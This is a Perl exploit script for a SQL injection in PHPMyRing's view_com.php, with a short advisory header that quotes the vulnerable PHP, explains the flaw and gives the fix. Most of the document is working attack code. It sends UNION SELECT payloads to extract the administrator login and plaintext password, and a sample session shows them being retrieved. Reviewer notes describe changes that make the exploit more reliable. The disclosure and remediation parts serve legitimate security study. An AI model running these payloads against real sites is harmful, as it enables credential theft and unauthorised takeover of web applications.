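#!/usr/bin/perl
#
# Title     : PHPMyRing (view_com.php) remote SQL injection exploit
# Vendor    : phpmyring
# Website   : http://phpmyring.sourceforge.net/
# Version   : <= 4.2.0
# Severity  : Critical
#
# Discovered by      : Simo64
# Exploit written by : Simo Ben youssef
# Discovered         : 09 August 2006
# Published          : 10 August 2006
#
# MorX Security Research Team - http://www.morx.org
#
# Details
# -------
# Vulnerable code in view_com.php, lines 14-24.  HTML markup inside the
# quoted PHP was stripped when this advisory was transcribed; it is shown
# as [html] below, the logic is unchanged.
#
#   if (!$idsite)
#   {
#       echo "[html]"._("Erreur! Le n° du site n'est pas défini!")."[html]";
#   }
#   else
#   {
#       // On va aller chercher le nom du site concerné, ça sera fait ;)
#       // Connexion MySQL
#       $conn=connecte();
#       $row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite"));  // <== SQL injection
#       $site_nom=$row['site_nom'];
#       ...............
#       [html]
#       <? echo _("Commentaires du site"). " ".$site_nom; ?>
#   }
#
# $idsite comes straight from the request and is interpolated into the
# query without an integer cast or escaping, so arbitrary SQL can be
# appended.  The original SELECT returns exactly one column (site_nom), so
# a one-column UNION SELECT against webring_adm is echoed back in place of
# the site name, as "Commentaires du site <value>".
#
# Fix for the application: cast the parameter (`$idsite = (int)$idsite;`)
# or, better, use a parameterised query.  The advisory also reports that
# the administrator password comes back as-is, i.e. it is stored in
# plaintext; hashing it would limit the damage of any future injection.
#
# Sample session (extracts the admin login and password):
#
#   C:\>perl ring.pl 127.0.0.1 webring
#   #################################################
#   # PHPMyRing's Remote SQL injection Exploit #
#   # Discovered by simo64_at_morx_org #
#   # Script writting by simo_at_morx_org #
#   # MorX Security Research Team #
#   # www.morx.org #
#   #################################################
#
#   [*] Trying to get the admin login ...
#   [+] your admin login is --> admin
#   [+] your admin pass is --> 123456
#
# Reviewer notes on this script (changes from the published listing):
#   * The closing HTML tag that terminated the two result regexes was also
#     stripped in transcription; the pattern below stops at the next '<',
#     which is the most conservative reconstruction.  Adjust it if the
#     installed template wraps the site name differently.
#   * Requests now use CRLF line endings (the original sent bare LF, which
#     HTTP does not permit and stricter servers reject), the response is
#     read as a whole before matching, and an optional port argument was
#     added.  The bare-LF request, the screen clear via the shell and the
#     cosmetic 2-second sleep were dropped; the "Trying to get the admin
#     password" message was only printed when the login lookup had failed,
#     which is fixed.  URL, payloads, banner and result messages are kept.
#   * This is a proof of concept for systems you are authorised to test.
#
# milw0rm.com [2006-08-09]

use strict;
use warnings;
use IO::Socket;

# Request pieces -- the payloads are the advisory's, kept byte-for-byte.
my $DEFAULT_PORT = 80;
my $SCRIPT       = "/view_com.php?idsite=";
my $SQLPASS      = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";
my $SQLADMIN     = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";

# Banner shown on every run and at the top of the usage screen.
sub banner {
    return join "",
        "#################################################\n",
        "# PHPMyRing's Remote SQL injection Exploit #\n",
        "# Discovered by simo64_at_morx_org #\n",
        "# Script writting by simo_at_morx_org #\n",
        "# MorX Security Research Team #\n",
        "# www.morx.org #\n",
        "#################################################\n\n";
}

# Usage text for program name $prog.  The two mandatory arguments are the
# target host and the install folder (the placeholders had been stripped
# from the published listing); the port is optional and defaults to 80.
sub usage {
    my ($prog) = @_;
    return "\n" . banner()
        . "--- Usage: perl $prog <target> <folder> [port]\n"
        . "--- Example: perl $prog 127.0.0.1 afd_webring\n\n";
}

# Build one raw HTTP/1.1 GET for $payload under /$folder on $host:$port.
# Returns the complete request text, terminated by the empty line.  The
# Host header carries the port only when it is not the default, as a
# browser would send it.
sub build_request {
    my ($folder, $payload, $host, $port) = @_;
    $port = $DEFAULT_PORT unless defined $port;
    my $host_header = $port == $DEFAULT_PORT ? $host : "$host:$port";
    return join "\r\n",
        "GET /$folder$SCRIPT$payload HTTP/1.1",
        "Host: $host_header",
        "Connection: Close",
        "",
        "";
}

# Pull the injected value out of a full HTTP response.  The page echoes
# "Commentaires du site <value>" followed by markup, so the value is the
# text between "site " and the next tag.  A leading status line and
# headers are skipped first so nothing in a header can be mistaken for
# the result.  Returns the value of the first match, or nothing when the
# page carries no such fragment (error page, injection blocked).  An
# empty string is a legitimate result: the column was empty.
sub extract_site_value {
    my ($response) = @_;
    return unless defined $response;

    my $body = $response;
    $body =~ s{\AHTTP/.*?\r?\n\r?\n}{}s;    # drop status line + headers if present

    if ($body =~ /site (.*?)</) {
        return $1;
    }
    return;
}

# Send one raw request to $target:$port and return the whole response
# (headers and body) as a single string.  Dies with the socket error when
# the connection cannot be opened; a connection that is accepted but
# returns nothing yields undef, which the caller reports as a failure.
sub fetch {
    my ($target, $port, $request) = @_;
    my $sock = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $target,
        PeerPort => $port,
    ) or die "Can't connect to $target:$port ($@)\n";

    print {$sock} $request;
    my $response = do { local $/; <$sock> };    # read until the server closes
    close $sock;
    return $response;
}

# Entry point: <target> <folder> [port].  Runs the two injections in turn
# and prints whatever the page echoed back.  Returns the process exit code.
sub main {
    my @args = @_;
    if (@args < 2) {
        print usage($0);
        return 0;
    }

    my ($target, $folder, $port) = @args;
    $port = $DEFAULT_PORT unless defined $port;
    die "Port must be numeric, got '$port'\n" unless $port =~ /\A\d+\z/;

    print banner();

    print "[*] Trying to get the admin login ...\n\n";
    my $login = extract_site_value(
        fetch($target, $port, build_request($folder, $SQLADMIN, $target, $port)));
    if (defined $login) {
        print "[+] your admin login is --> $login\n\n";
    }
    else {
        print "[-] Failed, cant get the admin login\n\n";
    }

    # Always attempted, independently of the login lookup (the original
    # only announced this step when the login lookup had failed).
    print "[*] Trying to get the admin password ...\n\n";
    my $pass = extract_site_value(
        fetch($target, $port, build_request($folder, $SQLPASS, $target, $port)));
    if (defined $pass) {
        print "[+] your admin pass is --> $pass\n\n";
    }
    else {
        print "[-] Failed, cant get the admin password\n";
    }

    return 0;
}

# Modulino guard: run as a script, stay passive when loaded for testing.
exit main(@ARGV) unless caller;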